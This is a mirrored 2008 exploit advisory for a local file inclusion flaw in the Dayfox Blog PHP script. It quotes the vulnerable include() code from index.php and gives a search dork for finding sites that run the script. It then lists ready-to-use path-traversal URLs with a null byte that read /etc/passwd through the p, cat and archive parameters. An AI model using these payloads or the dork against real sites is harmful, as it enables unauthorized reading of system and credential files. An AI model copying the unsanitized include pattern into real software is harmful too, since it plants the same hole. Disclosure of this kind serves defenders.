Lucene search

K

dayfox-lfi.txt

🗓️ 05 Aug 2008 00:00:00Reported by hadihadiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Dayfox Blog Local File Inclusion Vulnerabilit

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
` ########################################################################  
# #  
# ..:::::Dayfox Blog LOCAL FILE INCLUSION Vulnerbility ::::... #   
########################################################################  
  
Virangar Security Team  
  
www.virangar.net  
  
--------  
Discoverd By :Virangar Security Team (hadihadi)  
  
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra  
  
& all virangar members & all iranian hackerz  
  
greetz:to my best friend in the world hadi_aryaie2004  
& my lovely friend arash(imm02tal) from ISCN  
-----------------------------------  
Download: http://www.dayfoxdesigns.co.nr  
Dork:Powered by Dayfox Designs This is a port of WordPress   
-------------------------------------------------------------------------------------------------  
vuln codes in index.php:  
############line 140-144##################  
if (isset($_GET["cat"])) {  
$page = 'entries/'.strip_tags(htmlspecialchars($_GET["cat"])).'.txt';  
if (file_exists($page)) {  
echo "<br /><a href=\"javascript: history.go(-1)\">< Back</a>";  
@include ("$page");  
############line 173-178###################  
if (isset($_GET["p"])) {  
$page = 'entries/'.strip_tags(htmlspecialchars($_GET["p"])).'.txt';  
$pagecomments = 'entries/'.strip_tags(htmlspecialchars($_GET["p"])).'comments.txt';  
if (file_exists($page)) {  
echo '<br /><a href="javascript: history.go(-1)">< Back</a>';  
include ("$page");  
############line 209-213##################  
if (isset($_GET["archive"])) {  
$page = 'entries/'.strip_tags(htmlspecialchars($_GET["archive"])).'.txt';  
if (file_exists($page)) {  
echo '<br /><a href="javascript: history.go(-1)">< Back</a>';  
include ("$page");  
----------------------------------------------------------------------------------------------------  
  
exploit:  
http://site.com/index.php?p=../../../../../../../etc/passwd%00   
http://site.com/index.php?cat=../../../../../../../etc/passwd%00  
http://site.com/index.php?archive=../../../../../../../etc/passwd%00  
--------  
young iranian h4ck3rz  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo